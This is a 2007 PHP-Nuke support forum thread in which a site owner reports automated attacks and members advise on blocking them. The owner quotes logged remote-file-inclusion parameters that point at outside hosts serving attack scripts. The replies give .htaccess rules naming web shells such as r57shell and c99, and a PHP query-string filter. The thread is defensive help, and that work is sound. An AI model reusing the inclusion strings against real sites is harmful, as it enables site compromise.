You are missing our premiere tool bar navigation system! Register and use it for FREE!

NukeCops  
•  Home •  Downloads •  Gallery •  Your Account •  Forums • 
Readme First
- Readme First! -

Read and follow the rules, otherwise your posts will be closed
Modules
· Home
· FAQ
· Buy a Theme
· Advertising
· AvantGo
· Bookmarks
· Columbia
· Community
· Donations
· Downloads
· Feedback
· Forums
· PHP-Nuke HOWTO
· Private Messages
· Search
· Statistics
· Stories Archive
· Submit News
· Surveys
· Theme Gallery
· Top
· Topics
· Your Account
Who's Online
There are currently, 298 guest(s) and 13 member(s) that are online.

You are Anonymous user. You can register for free by clicking here
Nuke Cops :: View topic - Is this an attack?? [ ]
 Forum FAQ  •  Search  •   •  Memberlist  •  Usergroups   •  Register  •  Profile •    •  Log in to check your private messages  •  Log in

 
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
Author Message
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Tue Oct 09, 2007 4:02 pm Reply with quoteBack to top

Hello, for the last month at least, my website has been swarmed with this two filter attacks...

Here is the Agent:

User Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

and for the attacks one is

name=http://amyru.h18.ru/images/cs.txt

well, it has my site and some other stuff in there before that, let me know if you need to see that....

the other one is...

name=http://0x0134.lan.io/pb.php


the http on both are usually the same if i'm not mistaken... I have already banned some countries, like AU an NL, and have blocked who knows how many US IP's and have ranged blocked a lot of IP's from Canada....

So, is this a attack on my site, if so, i guess I'll just have to keep banning IP's if not, i'll need to unban some IP's... I have been getting about 100 plus attacks a day... Sad a lot of them are the same IP, but I ban them and it's like they just use another IP.

If you need anymore info, just let me know.

My website is... www.guardiansworlds.com

Thanks for any help anyone can share Smile

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Evaders99
Site Admin
Site Admin


Joined: Aug 17, 2003
Posts: 12482


PostPosted: Tue Oct 09, 2007 6:44 pm Reply with quoteBack to top

Yes these are automated attacks against your site. From what I can tell, they allow spammers to use your site to send out their junk emails.

Mostly these are from compromised systems, I doubt blocking IPs would be that effective. At least Nuke Sentinel seems to be working

_________________
Helping those that help themselves
Read FIRST or DIE!

"Fighting is terrible, but not as terrible as losing the will to fight."
Star Wars Rebellion Network - Need Help? Evaders Squadron Coding
Find all posts by Evaders99View user's profileSend private messageVisit poster's websiteAIM Address
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Tue Oct 09, 2007 7:43 pm Reply with quoteBack to top

Yeah, it's blocking all of them Smile Hope it stays that way. So, should I unban the IP's i've blocked?

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Slackervaara
Captain
Captain


Joined: Sep 13, 2003
Posts: 355


PostPosted: Tue Oct 09, 2007 9:21 pm Reply with quoteBack to top

I use modrewrite in .htaccess to automatically keep those hacking robots out from my site and instead they get a forbidden 403 page. l like modrewrite because it saves Sentinel from blocking a lot of hacking attempts:

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]

By the way my site have been attacked by the identical robot I have found out in the logs.
Find all posts by SlackervaaraView user's profileSend private message
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Wed Oct 10, 2007 3:32 pm Reply with quoteBack to top

Thanks for the info. Smile So, is there any type of filter attacks I should keep an eye out for, or should I just not ban any IP that attacks with a filter?

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Thu Oct 11, 2007 6:56 pm Reply with quoteBack to top

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack.... Rolling Eyes SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks.... Shocked

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Thu Oct 11, 2007 6:57 pm Reply with quoteBack to top

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack.... Rolling Eyes SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks.... Shocked

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Thu Oct 11, 2007 6:59 pm Reply with quoteBack to top

Well, I have started unblocking the range block IP's and also, I think I removed the country range block also... Because I just got 520 some emails from my website telling me about each attack.... Rolling Eyes SO..... I'm thinking about going back and blocking some countries... Sad I have to do that, but that is sure a lot of bot attacks.... Shocked

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Slackervaara
Captain
Captain


Joined: Sep 13, 2003
Posts: 355


PostPosted: Thu Oct 11, 2007 9:49 pm Reply with quoteBack to top

If you have an .htaccess file use modwrite to block these types of automatic hacker attacks and Sentinel will not block them then, but the hackers will not be succesful with their technique.

This is what I have in .htaccess to stop them:

RewriteEngine On

RewriteCond %{HTTP_USER_AGENT} ^libwww(-FM|-perl) [OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library [NC,OR]
RewriteCond % _CONF [OR]
RewriteCond % tool25 [OR]
RewriteCond % cmd.txt [OR]
RewriteCond % r57shell [OR]
RewriteCond % c99 [OR]
RewriteCond % THEME_DIR
RewriteRule ^.* - [F,L]

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]
Find all posts by SlackervaaraView user's profileSend private message
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Fri Oct 12, 2007 4:36 am Reply with quoteBack to top

So do I just add that code into my .htaccess file? Or is there a program called modwrite?

Thanks for the info Smile

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Slackervaara
Captain
Captain


Joined: Sep 13, 2003
Posts: 355


PostPosted: Fri Oct 12, 2007 9:18 am Reply with quoteBack to top

Yes, it is just to add it in .htaccess. Modrewrite is a module in the apache server that fixes this. It must be installed though in order for it to work.
Find all posts by SlackervaaraView user's profileSend private message
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Fri Oct 12, 2007 5:17 pm Reply with quoteBack to top

I will try and add that in my .htaccess file. Today, I got 850 some emails... Rolling Eyes My website is running on lunarpages server, so, i'm hoping this will work... I guess I will find out tomorrow...

Thanks for the info, Smile

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Sat Oct 13, 2007 7:13 am Reply with quoteBack to top

Just want to let you know, that worked Smile Well it seems it has... Very Happy Because I checked my email today, and no filter attacks have been sent from my site. Thanks big time. Smile So is there a place I can keep check, to see if any new code is needed to be added(like if a new attack comes out)??? Just to make sure I'm up to date.

Thanks again Slackervaara, that code did just the trick Smile

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
telli
Support Mod
Support Mod


Joined: Aug 21, 2003
Posts: 335


PostPosted: Tue Oct 16, 2007 10:51 am Reply with quoteBack to top

All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}

_________________
[img]http://www.codezwiz.com/extern.php?get=sig[/img]
http://www.codezwiz.com
PHPNuke Themes
$3.99 500 MB Storage & 20 GIG Trans w/ NO limit MYSQL
Click Me
Find all posts by telliView user's profileSend private message
Guardiannknight
Nuke Soldier
Nuke Soldier


Joined: Aug 09, 2005
Posts: 28


PostPosted: Wed Oct 17, 2007 11:50 am Reply with quoteBack to top

telli wrote:
All of these attacks require loading a file from another server so they have to use a direct link to it. You can block that by simply adding this line of code to your config.php.

Code:

//http and https should not be used in any query string
if (eregi('http', $_SERVER['QUERY_STRING']) || eregi('https', $_SERVER['QUERY_STRING'])) {
   header('Location: http://' . $_SERVER['SERVER_NAME']);
   exit;
}





So, would it be good to use this along with the stuff I have added to the .htacess file?

_________________
www.guardiansworlds.com
Find all posts by GuardiannknightView user's profileSend private messageVisit poster's website
Display posts from previous:      
Post new topic  Reply to topicprinter-friendly view
View previous topic Log in to check your private messages View next topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum



Powered by phpBB © 2001, 2005 phpBB Group

Ported by Nuke Cops © 2003 www.nukecops.com
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::
Powered by TOGETHER TEAM srl ITALY http://www.togetherteam.it - DONDELEO E-COMMERCE http://www.DonDeLeo.com - TUTTISU E-COMMERCE http://www.tuttisu.it
Web site engine's code is Copyright © 2002 by PHP-Nuke. All Rights Reserved. PHP-Nuke is Free Software released under the GNU/GPL license.
Page Generation: 0.055 Seconds - 671 pages served in past 5 minutes. Nuke Cops Founded by Paul Laudanski (Zhen-Xjell)
:: FI Theme :: PHP-Nuke theme by coldblooded (www.nukemods.com) ::